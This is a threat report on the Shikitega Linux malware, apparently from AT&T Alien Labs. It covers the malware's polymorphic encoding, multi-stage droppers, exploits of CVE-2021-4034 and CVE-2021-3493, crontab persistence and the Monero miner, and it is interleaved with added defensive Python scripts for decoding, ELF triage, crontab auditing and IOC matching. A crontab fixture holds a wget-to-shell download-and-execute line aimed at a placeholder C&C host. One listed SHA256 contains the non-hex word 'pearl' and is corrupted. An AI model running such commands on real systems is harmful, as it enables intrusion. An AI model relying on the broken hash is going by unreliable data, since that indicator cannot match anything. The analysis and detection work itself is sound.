Shikitega – New stealthy malware targeting Linux
Executive Summary
AT&T Alien Labs discovered new malware targeting endpoints and IoT devices running Linux operating systems. Shikitega is delivered in a multi-stage infection chain in which each module is responsible for one part of the payload and downloads and executes the next. An attacker can gain full control of the system, in addition to the cryptocurrency miner that is run and set to persist.
Key takeaways:
- The malware downloads and executes Metasploit’s “Mettle” meterpreter to maximize its control over infected machines.
- Shikitega exploits system vulnerabilities to gain high privileges, persist and run a crypto miner.
- The malware uses a polymorphic encoder to make it harder for antivirus engines to detect.
- Shikitega abuses legitimate cloud services to host some of its command and control (C&C) servers.
Figure 1. Shikitega operation process.
Background
With a nearly 650% increase in Linux malware and ransomware this year, reaching an all-time high in the first half of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable, and keep finding new ways to deliver their malicious payloads. New malware such as BotenaGo and EnemyBot are examples of malware authors quickly incorporating newly discovered vulnerabilities to find new victims and increase their reach.
Shikitega uses a multi-layer infection chain, where the first layer contains just a few hundred bytes, and each module is responsible for a specific task: downloading and running the Metasploit meterpreter, exploiting Linux vulnerabilities, configuring persistence on the infected machine, and finally downloading and running a cryptominer.
Analysis
The main dropper of the malware is a very small ELF file, with a total size of only around 370 bytes, while the actual size of the code is around 300 bytes. (Figure 2)
Figure 2. Malicious ELF file with a total of only 376 bytes.
The malware uses the “Shikata Ga Nai” polymorphic XOR additive feedback encoder, which is one of the most popular encoders used in Metasploit. Using the encoder, the malware runs through several decoding loops, where one loop decodes the next layer, until the final shellcode payload is decoded and executed. The encoder stub is generated based on dynamic instruction substitution and dynamic block ordering. In addition, registers are selected dynamically. Below we can see how the encoder decrypts the first two loops: (Figures 3 and 4)
Figure 3. First “Shikata Ga Nai” decryption loop.
Figure 4. Second “Shikata Ga Nai” decryption loop created by the first.
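To make the decode loop concrete for an analyst who has to unpack a sample statically, the following is an added Python emulation of an XOR additive feedback loop of the kind Shikata Ga Nai generates. It is not code from the sample or from AT&T Alien Labs, and it generalises from the two loops shown in the figures to any number of nested layers. The payload bytes, the keys and the NOP padding are constructed assumptions for the demonstration.

```python
import struct

MASK32 = 0xFFFFFFFF


def xor_additive_feedback_decode(encoded: bytes, key: int) -> bytes:
    """Emulate one Shikata-Ga-Nai-style decode loop.

    Each little-endian 32-bit word is XORed with the running key, and the
    *decoded* word is then added to the key (mod 2**32) before the next
    iteration; that feedback is what makes every encoded word depend on the
    ones before it.
    """
    if len(encoded) % 4:
        raise ValueError("encoded buffer must be a whole number of 32-bit words")
    key &= MASK32
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", encoded):
        plain = word ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK32
    return bytes(out)


def xor_additive_feedback_encode(plain: bytes, key: int) -> bytes:
    """Inverse of the decoder; used here only to build fixtures for analysis."""
    plain += b"\x90" * (-len(plain) % 4)  # assumption: NOP-pad to a word boundary
    key &= MASK32
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", plain):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK32
    return bytes(out)


def decode_layers(encoded: bytes, keys: list) -> bytes:
    """Peel nested layers: the outermost loop (last key applied) runs first."""
    data = encoded
    for key in reversed(keys):
        data = xor_additive_feedback_decode(data, key)
    return data


def encode_layers(plain: bytes, keys: list) -> bytes:
    """Apply several layers, innermost key first (fixture builder only)."""
    data = plain
    for key in keys:
        data = xor_additive_feedback_encode(data, key)
    return data


# Constructed payload: the seven bytes of "mov eax, 102 ; int 0x80", i.e. the
# sys_socketcall invocation the article describes. Not bytes from the sample.
SAMPLE_PAYLOAD = b"\xb8\x66\x00\x00\x00\xcd\x80"
# Constructed keys; the real encoder picks them per sample.
SAMPLE_KEYS = [0x2A6C1F33, 0x9E3779B9]


def demo() -> bytes:
    """Round trip: two encode layers, then peel both and recover the payload."""
    encoded = encode_layers(SAMPLE_PAYLOAD, SAMPLE_KEYS)
    decoded = decode_layers(encoded, SAMPLE_KEYS)
    assert decoded.startswith(SAMPLE_PAYLOAD)
    return decoded


if __name__ == "__main__":
    print(demo().hex())
```

The keys and the number of layers are the only per-sample inputs; in practice an analyst reads them from the decoder stub of each loop (the initial key register and the loop count) and feeds them to `decode_layers` in the order the stubs appear.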
After several decryption loops, the final payload shellcode will be decrypted and executed. Since the malware does not use any imports, it uses ‘int 0x80’ to execute the appropriate system call. As the main code of the dropper is very small, the malware will download and execute additional commands from its command and control by calling syscall 102 (sys_socketcall). (Figure 5)
Figure 5. Calling system functions using interrupts.
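As an added example (not from the report), the following Python triage heuristic looks for the traits described above: a tiny, statically linked, section-less ELF that issues raw `int 0x80` system calls, including the `mov eax, 102 ; int 0x80` pattern for sys_socketcall. The fixture ELF it scans is built inside the script and is not the Shikitega dropper; the 1024-byte threshold and the opcode patterns are assumptions.

```python
import re
import struct

ELF32_EHDR = "<16sHHIIIIIHHHHHH"   # 52-byte ELF32 header
ELF32_PHDR = "<IIIIIIII"           # 32-byte program header
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3

# "int 0x80" with eax (or al) already set to 102 = sys_socketcall:
#   b8 66 00 00 00 cd 80   mov eax, 0x66 ; int 0x80
#   b0 66 cd 80            mov al, 0x66  ; int 0x80
SOCKETCALL_INT80 = re.compile(rb"(?:\xb8\x66\x00\x00\x00|\xb0\x66)\xcd\x80")


def analyze_elf32(blob: bytes, tiny_threshold: int = 1024) -> dict:
    """Heuristic triage: flag tiny, static, section-less ELF32 binaries that
    issue raw int 0x80 system calls. Returns the individual signals too, so
    the verdict can be tuned."""
    result = {"is_elf32": False, "size": len(blob)}
    if len(blob) < 52 or blob[:4] != b"\x7fELF" or blob[4] != 1:  # EI_CLASS 1 = 32-bit
        return result
    (_ident, _type, _machine, _version, _entry, phoff, _shoff, _flags,
     _ehsize, phentsize, phnum, _shentsize, shnum, _shstrndx) = struct.unpack_from(ELF32_EHDR, blob, 0)
    ptypes = []
    for i in range(phnum):
        off = phoff + i * phentsize
        if off + struct.calcsize(ELF32_PHDR) > len(blob):
            break  # truncated header table; do not crash the scanner
        ptypes.append(struct.unpack_from(ELF32_PHDR, blob, off)[0])
    result.update({
        "is_elf32": True,
        "tiny": len(blob) < tiny_threshold,
        "has_section_headers": shnum > 0,
        "uses_dynamic_loader": any(t in (PT_DYNAMIC, PT_INTERP) for t in ptypes),
        "int80_count": blob.count(b"\xcd\x80"),
        "socketcall_via_int80": SOCKETCALL_INT80.search(blob) is not None,
    })
    result["suspicious"] = (result["tiny"] and not result["has_section_headers"]
                            and not result["uses_dynamic_loader"]
                            and result["int80_count"] > 0)
    return result


def build_tiny_elf32(code: bytes, base: int = 0x08048000) -> bytes:
    """Constructed fixture (not a real sample): a static ELF32 with one RX
    PT_LOAD segment, no section headers, and `code` right after the headers."""
    hdr_len = struct.calcsize(ELF32_EHDR) + struct.calcsize(ELF32_PHDR)  # 84
    total = hdr_len + len(code)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELF32, LSB, version 1, SysV ABI
    ehdr = struct.pack(ELF32_EHDR, ident, 2, 3, 1, base + hdr_len, 52, 0, 0,
                       52, 32, 1, 0, 0, 0)  # ET_EXEC, EM_386, one phdr, no shdrs
    phdr = struct.pack(ELF32_PHDR, PT_LOAD, 0, base, base, total, total, 5, 0x1000)  # flags 5 = R+X
    return ehdr + phdr + code


# Constructed body: xor eax,eax ; mov al,0x66 ; int 0x80 (a bare socketcall), NOP padded.
SAMPLE_CODE = b"\x31\xc0\xb0\x66\xcd\x80" + b"\x90" * 10
SAMPLE_ELF = build_tiny_elf32(SAMPLE_CODE)

if __name__ == "__main__":
    print(analyze_elf32(SAMPLE_ELF))
```

The byte-pattern signals are intentionally cheap and produce false positives on hand-written static tools, so treat the `suspicious` verdict as a reason to pull the file for analysis rather than as a detection on its own.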
The C&C will respond with additional shell commands to execute, as seen in the packet capture in Figure 6. The first bytes marked in blue are the shell commands that the malware will execute.
Figure 6. Additional commands received from C&C.
The received command will download additional files from the server that will not be saved on the hard drive, but will be executed only from memory. (Figure 7)
Figure 7. Executing additional shellcode received from C&C.
In other malware versions, it will use the “execve” system call to execute ‘/bin/sh’ with the command received from the C&C. (Figure 8)
Figure 8. Executing shell commands using syscall_execve.
The malware downloads and executes ‘Mettle’, a Metasploit meterpreter that allows the attacker to use a wide range of attacks, from webcam control, sniffer, multiple reverse shells (tcp/http…), process control, command execution shell and more.
Additionally, the malware will use wget to download and run the next stage dropper.
Next stage dropper
The next downloaded and executed file is an additional small ELF file (about 1kb) encoded with the “Shikata Ga Nai” encoder. The malware decrypts a shell command to be executed by calling syscall_execve with ‘/bin/sh’ as a parameter, together with the decrypted shell command. (Figure 9)
Figure 9. The second-stage dropper decrypts and executes shell commands.
The executed shell command will download and execute additional files. To run the next and final stage dropper, it exploits two Linux privilege escalation vulnerabilities: CVE-2021-4034 and CVE-2021-3493 (Figures 10 and 11).
Figure 10. Exploitation of Linux vulnerability CVE-2021-3493.
Figure 11. Exploitation of vulnerability CVE-2021-4034.
The malware will use the exploit to download and execute the final stage with root privileges: persistence and the cryptominer payload.
Persistence
In order to achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting up 4 crontabs, two for the currently logged-in user and the other two for the root user. It will first check whether the crontab command exists on the machine, and if not, the malware will install it and start the crontab service.
To ensure that only one instance is running, it uses the flock command with a “/var/tmp/vm.lock” lock file.
Figure 12. Adding a root crontab to run the final payload.
Below is the list of scripts downloaded and executed to achieve persistence:
| Script name | Details |
|---|---|
| unix.sh | Check whether the “crontab” command exists on the system; if not, install it and start the crontab service. |
| brict.sh | Add crontab for the current user to run the cryptominer. |
| politrict.sh | Add root crontab to run the cryptominer. |
| truct.sh | Add crontab for the current user to download the cryptominer and config from C&C. |
| restrict.sh | Add root crontab to download the cryptominer and config from C&C. |
Since the malware persists through crontabs, it will delete all downloaded files from the system to hide its presence.
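An added Python audit script (not part of the report) that parses crontab text and flags the persistence traits described above: commands run from /var/tmp or /tmp, flock lock files in those directories, wget/curl piped into a shell, and high-frequency schedules. The sample crontab it scans is constructed, with a placeholder hostname and paths, and is not the malware's real crontab; the tag names and the 10-minute frequency cut-off are assumptions.

```python
import re

# Constructed sample crontab, modelled on the behaviour this article describes
# (flock on /var/tmp/vm.lock, a wget-to-shell pipeline, frequent schedules).
# The hostname and paths are placeholders, not the malware's real ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * flock -n /var/tmp/vm.lock /var/tmp/.x/miner --config /var/tmp/.x/cfg.json
@reboot wget -q -O- http://cnc.example.invalid/s.sh | sh
15 2 * * 0 /usr/local/bin/backup.sh
"""

PATTERNS = [
    ("download-and-execute", re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:ba)?sh\b")),
    ("exec-from-tmp", re.compile(r"(?<![\w/])/(?:var/)?tmp/\S+")),
    ("flock-in-tmp", re.compile(r"\bflock\b.*?/(?:var/)?tmp/")),
]


def parse_crontab(text: str):
    """Yield (schedule, command) pairs; skips comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                     # @reboot, @hourly, ...
            parts = line.split(None, 1)
            yield parts[0], (parts[1] if len(parts) > 1 else "")
            continue
        parts = line.split(None, 5)
        if "=" in parts[0] or len(parts) < 6:        # environment assignment or malformed
            continue
        yield " ".join(parts[:5]), parts[5]


def runs_frequently(schedule: str, max_minutes: int = 10) -> bool:
    """True for every-minute or */N (N <= max_minutes) minute fields."""
    minute = schedule.split()[0]
    if minute == "*":
        return True
    return minute.startswith("*/") and minute[2:].isdigit() and int(minute[2:]) <= max_minutes


def audit_crontab(text: str) -> list:
    """Return one finding per entry that matches at least one pattern; a
    frequent schedule is reported only alongside another signal to keep
    ordinary */5 monitoring jobs out of the results."""
    findings = []
    for schedule, command in parse_crontab(text):
        tags = [name for name, rx in PATTERNS if rx.search(command)]
        if tags and runs_frequently(schedule):
            tags.append("high-frequency")
        if tags:
            findings.append({"schedule": schedule, "command": command, "tags": tags})
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(finding["tags"], finding["schedule"], finding["command"])
```

Run it over both the user crontabs (`crontab -l -u <user>`) and the root crontab, since the report notes the malware installs two of each; and because the dropped scripts are deleted after installation, the crontab entries are often the only artefact left on disk.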
Cryptominer Payload
The malware downloads and runs the XMRig miner, a popular miner for the Monero cryptocurrency. It will also set up a crontab to download and run the cryptominer and its configuration from the C&C, as mentioned in the persistence section above.
Figure 13. The XMRig miner is downloaded and executed on an infected machine.
Command and control
Shikitega uses cloud solutions to host some of its command and control (C&C) servers, as shown in OTX in Figure 14. Since the malware in some cases communicates with the command and control server directly using an IP address without a domain name, it is difficult to provide a complete list of indicators for detection, as they are volatile and will be reused for legitimate purposes within a short period of time.
Figure 14. Command and control server hosted on a legitimate cloud hosting service.
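Because the domain indicators in the IOC table below are defanged, matching them against telemetry needs a refang step and a suffix-aware comparison (a substring match on "cloudflare" would fire on the legitimate service the malware is impersonating). The following is an added Python example, not from the report, that applies the two domains from the table to constructed DNS resolver log lines; the log format, hostnames and timestamps are assumptions.

```python
import re

# Defanged domains exactly as this article's IOC table lists them.
DEFANGED_DOMAINS = ["dash[.]cloudflare.ovh", "main[.]cloudfronts.net"]

# Constructed DNS resolver log lines (placeholder hosts/timestamps), not real telemetry.
# The cloudflare.com and cdn.cloudfront.net entries are decoys that must NOT match.
SAMPLE_DNS_LOG = [
    "2022-09-06T10:01:12Z host01 dns query=www.cloudflare.com type=A",
    "2022-09-06T10:01:13Z host01 dns query=dash.cloudflare.ovh. type=A",
    "2022-09-06T10:02:40Z host02 dns query=MAIN.cloudfronts.net type=A",
    "2022-09-06T10:03:01Z host02 dns query=cdn.cloudfront.net type=A",
]

LOG_QUERY = re.compile(r"\bquery=(?P<q>\S+)")


def refang(indicator: str) -> str:
    """Normalise a defanged indicator so it can be compared against telemetry."""
    s = indicator.strip().lower()
    for defanged, real in (("[.]", "."), ("(.)", "."), ("[dot]", "."), ("hxxp", "http")):
        s = s.replace(defanged, real)
    return s.rstrip(".")


def domain_matches(query: str, ioc_domain: str) -> bool:
    """Exact or subdomain match only; never a plain substring match."""
    q = query.lower().rstrip(".")
    return q == ioc_domain or q.endswith("." + ioc_domain)


def scan_dns_log(lines, defanged_iocs) -> list:
    """Return (host, queried name, matched indicator) for every hit."""
    iocs = [refang(d) for d in defanged_iocs]
    hits = []
    for line in lines:
        m = LOG_QUERY.search(line)
        if not m:
            continue
        queried = m.group("q").lower().rstrip(".")
        for ioc in iocs:
            if domain_matches(queried, ioc):
                hits.append((line.split()[1], queried, ioc))
    return hits


if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG, DEFANGED_DOMAINS):
        print(hit)
```

The same refang and suffix logic applies to proxy and NetFlow records keyed on SNI or Host headers; the SHA256 values in the table can be compared directly, since hashes are never defanged.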
Recommended actions
- Keep your software up to date with security updates.
- Install antivirus and/or EDR on all endpoints.
- Use a backup system to back up server files.
Conclusion
Threat actors continue to look for new ways to deliver malware in order to stay under the radar and avoid detection. Shikitega malware is delivered in a sophisticated way: it uses a polymorphic encoder and gradually delivers its payload, where each step reveals only part of the total payload. Additionally, the malware abuses known hosting services to host its command and control servers. Stay safe!
Associated indicators (IOC)
The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note that the pulse may include other related activity outside the scope of the report.
| TYPE | INDICATOR | DESCRIPTION |
|---|---|---|
| DOMAIN | dash[.]cloudflare.ovh | Command and control |
| DOMAIN | main[.]cloudfronts.net | Command and control |
| SHA256 | b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331 | Malware hash |
| SHA256 | 0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed | Malware hash |
| SHA256 | f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb | Malware hash |
| SHA256 | 8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732 | Malware hash |
| SHA256 | d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374 | Malware hash |
| SHA256 | fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765 | Malware hash |
| SHA256 | e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d | Malware hash |
| SHA256 | cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d | Malware hash |
| SHA256 | d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8 | Malware hash |
| SHA256 | 29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8 | Malware hash |
| SHA256 | 4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7 | Malware hash |
| SHA256 | 130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5 | Malware hash |
| SHA256 | 3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098 | Malware hash |
| SHA256 | 6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275 | Malware hash |
| SHA256 | 7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad | Malware hash |
| SHA256 | 2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab | CVE-2021-3493 malware hash |
| SHA256 | 4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f | CVE-2021-4034 malware hash |
| SHA256 | e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4 | Malware hash |
| SHA256 | 64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4 | Malware shell script |
| SHA256 | 623e7ad399c10f0025fba333a170887d0107pearl29b60b07f5e93d26c9124955 | Malware shell script |
| SHA256 | 59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af | Malware shell script |
| SHA256 | 9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338 | Malware shell script |
| SHA256 | 05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464 | Malware shell script |
| SHA256 | ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d | Malware hash |
Mapped to MITRE ATT&CK
The findings of this report are mapped to the following MITRE ATT&CK matrix techniques:
- TA0002: Execution
- T1059: Command and Scripting Interpreter
- T1569: System Services
- T1569.002: Service Execution
- TA0003: Persistence
- T1543: Create or Modify System Process
- TA0005: Defense Evasion
- T1027: Obfuscated Files or Information